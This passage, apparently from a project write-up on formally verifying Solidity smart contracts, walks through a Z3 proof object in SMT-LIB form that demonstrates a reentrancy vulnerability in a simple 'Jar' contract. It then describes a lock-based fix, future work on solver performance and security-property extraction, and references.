 (let ((@x2953 ((_ hyper-res 0 0 0 1 0 2) (asserted $x953) @x3082 ((_ hyper-res 0 0) @x3083 (Ext ?x2347 (_ bv1 2) ?x2347 (_ bv1 2))) (Ext ?x2347 (_ bv2 2) ?x2247 (_ bv1 2)))))
      (let (($x999 (forall ((A (Array Unit (_ BitVec 2))) (B Unit) (C (_ BitVec 2)) (D (_ BitVec 2)) (E (_ BitVec 2)) (F (Array Unit (_ BitVec 2)))
                            (G (_ BitVec 2)) (H (Array Unit (_ BitVec 2))) (I (_ BitVec 2)) (J (Array Unit (_ BitVec 2))) (K (_ BitVec 2)) (L (Array Unit (_ BitVec 2))) )
                           (let (($x997 (and (Ext A I J K) (Ext A E F G) (not (= (select A B) (_ bv0 2))) (= E (bvadd D (bvmul (_ bv3 2) (select A B))))
                                             (= I (bvadd D (bvmul (_ bv3 2) (select A B)))) (= H (store F B (_ bv0 2))) (= L (store J B (_ bv0 2)))
                                             (or (not (= L H)) (not (= K G))) (bvule (select A B) D))))
                                (=> $x997 (query!0 A D B C L K 0 0 H G)))) ))
           (mp ((_ hyper-res 0 0 0 1 0 2) (asserted $x999) @x2953 @x3082 $x2931) (asserted (=> $x2931 false)) false))))))))))))

In the same way as SMTLIB2, the output is in the S-expression of Lisp, where a list (a b c) denotes a function application a(b, c) in the common mathematical notation. The proof begins with the specification of the logic, that is HORN as we specified in the original model definition. The function query!0 is boolean valued, and this boolean value is meant to stand for the negation of the security property. Its arguments are corresponding to the universally quantified variables of the last assertion, the security property. Recall that our unsatisfiability proof is an evidence of the fact that the negation of the security property holds under the condition that all the other assertions hold. The negation of the security property is logically equivalent to an existential formula (due to the duality of the quantifiers). An unsatisfiability proof by Z3 provides a concrete instantiation, i.e. the witness, of those existentially quantified variables, and the witness and logical reasoning present in the proof show the divergent behaviors of the smart contract.

The next line opens the proof object. We see a sequence of definitions due to let construct. Variables with the prefix ? points to data such as a mapping and a bitvector. Also, the prefix $ means a variable pointing to a boolean value and @ a proof. The mapping is of the sort Array Unit (_ BitVec 2), that is a mapping from the singleton to the bitvector of length 2. Note that the singleton value is unique, and hence this mapping is isomorphic to the bitvector of length 2.

?x2247 points to the balance whose value is constantly 0. Here, (_ bv0 2) is 0 of the sort bitvector of length 2. We denote it as an array [0].

?x2347 is the array [1]. It is obtained by updating the 0th element (the unique element because of unit) of ?x2247 to be 1.

$x2931 is a boolean value (query!0 [1] 3 unit 0 [0] 1 0 0 [0] 2). Those arguments are the witness found by Z3 to prove the negation of the security property. Taking the goal formula in an existential form, the claim corresponding to $x2931 looks as follows.

(and (Jar [1] 3)
     (T [1] 3 unit 0 [0] 1 0)
     (T [1] 3 unit 0 [0] 2 0)
     (= 0 0)
     (= 0 0)
     (not (and (= [0] [0]) (= 1 2))))

It is now clear from the first conjunct (Jar [1] 3) that this proof is considering the case when the contract's status is ([1], 3); the balance [1] indicates that the 0th account holder has the deposit which amounts to 1, and the asset of the contract amounts to 3. It is apparently true because we have the assertion which makes Jar hold for an arbitrary state. The next two conjuncts involving T describe transitions due to withdraw. As the 5th and 6th arguments of T denote, one goes to the state of the contract ([0], 1) and the other goes to ([0], 2). Both are without no revert, as the 7th argument of T stands for the revert flag. The last conjunct is true, because (= 1 2) is false, the whole conjunct is true. At the end, the provided proof shows that $x2931, the negation of the security property, is indeed true. It contradicts the security property we asserted, and hence Z3 successfully proves the unsatisfiability.

$x534 is a formula forall A, B, (Ext A B A B).

@x3083 is defined to point to the proof of the claim $x534. Due to our assertion on Ext, the formula $x534 is apparently true. The operator asserted makes a proof object of the formula whose validity comes from available assertions.

@x3082 is a proof of (Ext [1] 2 [1] 2) obtained by the resolution method applied to @x3083. The operator (_ hyper-res ...) does automated reasoning due to resolution, taking several arguments. The first one is an already existing proof, and the last one is the desired conclusion obtained by applying resolution to the given proof. Further arguments come inbetween, when there are additional proofs to supply for resolution.

$x953 is an implication formula. The premise is a conjunction defined as $x951 and the conclusion is (Ext H I G F), which looks as follows, omitting universal quantifier over A, B, ..., H, and I.

(=> (and (Ext H I A C)
         (Ext A D E F)
         (not (= (select A B) 0))
         (= D (+ C (* 3 (select A B))))
         (= G (store E B 0))
         (<= (select A B) C))
    (Ext H I G F))

Here, => stands for the logical implication. For readability, we write +, *, and <= for the arithmetical addition (bvadd), multiplication (bvmul), and less than or equal to (bvule) in bitvectors.

@x2953 is a proof of (Ext [1] 2 [0] 1). It is obtained by resolution applied to four arguments. The first one, (asserted $x953) is a proof of the formula $x953 due to assertions. The solver uses assertions in particular concerning Q_alpha, Q_1, Q_2, Q_3, Q_omega, T, and Ext to carry out the proof. The last argument, i.e. the fourth one, is (Ext [1] 2 [0] 1) which is the conclusion of this proof @x2953. In order to obtain this conclusion, it suffices to find suitable instantiations for quantified variables of $x953 and to prove the premise $x951 of the implication in the kernel of $x953. The solver does it by means of the resolution using the second and the third arguments, . They are necessary to prove the non-trivial conjuncts (Ext H I A C) and (Ext A D E F). The first one is due to a direct use of @x3082, and we now see (Ext H I A C) is (Ext [1] 2 [1] 2). On the other hand, ((_ hyper-res 0 0) @x3083 (Ext ?x2347 (_ bv1 2) ?x2347 (_ bv1 2))) has the conclusion (Ext [1] 1 [1] 1) which comes by a simple instantiation of @x3083 due to resolution.

As we have discussed so far, both (Ext [1] 2 [1] 2) and (Ext [1] 2 [0] 1) are proven. They show the divergent state transitions due to external behavior of the contract. From the state ([1], 2), one goes to the identical state ([1], 2) and the other goes to ([0], 1). It is indeed the cause of the vulnerability.

$x999 is a universally quantified formula whose kernel is of the form $x997 => (query!0 A D B C L K 0 0 H G).

$x997 is defined to be the following conjunction formula.

(and (Ext A I J K)
     (Ext A E F G)
     (not (= (select A B) 0))
     (= E (+ D (* 3 (select A B))))
     (= I (+ D (* 3 (select A B))))
     (= H (store F B 0))
     (= L (store J B 0))
     (not (or (= L H) (not (= K G))))
     (<= (select A B) D))

Now we come to the final steps of the whole proof, which derives by modus ponens mp falsity from the proof of $x2931 and the proof of its negation, i.e. $x2931 => false. The latter one is the double negation of our security property, hence an assertion. The former proof is due to resolution. The first argument given to (_ hyper-res 0 0 0 1 0 2) is a proof of $x999 by asserted. Recall that query!0 is a boolean valued function, and its boolean value is meant for the negation of the security property. In order to prove it, it suffices to prove the conjunction formula inside the kernel of the security property formula, namely,

(and (Jar b tb)
     (T b tb s v b^ tb^ r^)
     (T b tb s v b_^ tb_^ r_^)
     (= r^ 0)
     (= r_^ 0)
     (not (and (= b^ b_^) (tb^ = tb_^))))

providing suitable substitutions for the quantified variables. In order to prove query!0 A D B C L K 0 0 H G, the conclusion of the formula $x999, it suffices to prove that the corresponding instantiation of the above conjunction

(and (Jar A D)
     (T A D B C L K 0)
     (T A D B C H G 0)
     (= 0 0)
     (= 0 0)
     (not (and (= L H) (= K G))))

is straightforwardly implied from the conjunction formula $x997 by means of the assertions concerning Jar, T, Q_1, Q_2, Q_3, and Q_omega in our model. Notice that the premises concerning Ext is necessary as the body of the Horn clause concerning Q_3 involves Ext. By resolution, the body of the Horn clause $x999 is all proven, thanks to the additionally supplied proofs @x2953 and @x3082, which respectively claim (Ext [1] 2 [0] 1) and (Ext [1] 2 [1] 2), and it gives a proof of $x2931, that is (query!0 [1] 3 unit 0 [0] 1 0 0 [0] 2). It clarifies that there are two diverging transactions as mentioned at the beginning of this section, and moreover it contradicts the asserted security property.

Satisfiable result for secure Jar

Thanks to the lock object, the reentrancy is prevented and we get a satisfiable result of Z3, which means that there is no concern about the reentrancy vulnerability. In order for a fully automated verification, deposit is also locked as well as withdraw is. It makes it impossible to make a deposit by making use of reentrancy. This is harmless to prohibit such a thing, and we consider this additional lock of deposit is acceptable for carrying out verification. The SMT model for the fixed Jar contract doesn't require any essentially new feature.

Future work

Our future work can be split into two kinds. The one is about the performance of automated reasoning, and the second is about the optimality, generality, and automated extraction of the security property.

An improvement for the performance of automated reasoning is crucial, because it indeed prevented us from us employing a proper security property and as a result we had to accept ad-hoc modifications to the security property. Due to the same reason, it is also not possible to make use of an invariance, described below, at the moment. One common strategy is to use several tools in parallel and make use of available results. We will follow it and try other SMT solvers and theorem provers to overcome this issue. We already tried the SMT solver cvc5, but it did not show a better performance over Z3/Spacer for our particular problem.

In order for fully automatic verification, an extraction procedure of the security property is necessary. The ad-hoc modifications we had to give in the previous sections should be gone, although in order to get a witness of the security violation through an unsatisfiability proof, a specialized model still yields a sound result. A more optimal description of the security property is available by means of an invariance. For example, the difference between the amount of the asset of the Jar contract and the total sum of the deposits is constant, as long as we have calls to deposit and withdraw.

The implementation of the official Solidity compiler solc has already had features to generate CHC models from Solidity source codes. Ideally, our future implementation work should be integrated with solc.

External links

SMTChecker and Formal Verification (https://docs.soliditylang.org/en/latest/smtchecker.html)
What is a reentrancy attack in Solidity? https://www.alchemy.com/overviews/reentrancy-attack-solidity
Hack Solidity: Reentrancy Attack https://hackernoon.com/hack-solidity-reentrancy-attack
Getting proof trees from Spacer (Z3Prover/z3#4863)
Hyper-resolution rule (https://github.com/Z3Prover/z3/blob/master/src/api/z3_api.h#L748)

References

[1] Leonardo Alt, Martin Blicha, Antti E. J. Hyvärinen, Natasha Sharygina: SolCMC: Solidity Compiler's Model Checker. CAV (1) 2022: 325-338

[2] Matteo Marescotti, Rodrigo Otoni, Leonardo Alt, Patrick Eugster, Antti E. J. Hyvärinen, Natasha Sharygina: Accurate Smart Contract Verification Through Direct Modelling. ISoLA (3) 2020: 178-194

miyamok/reentrancy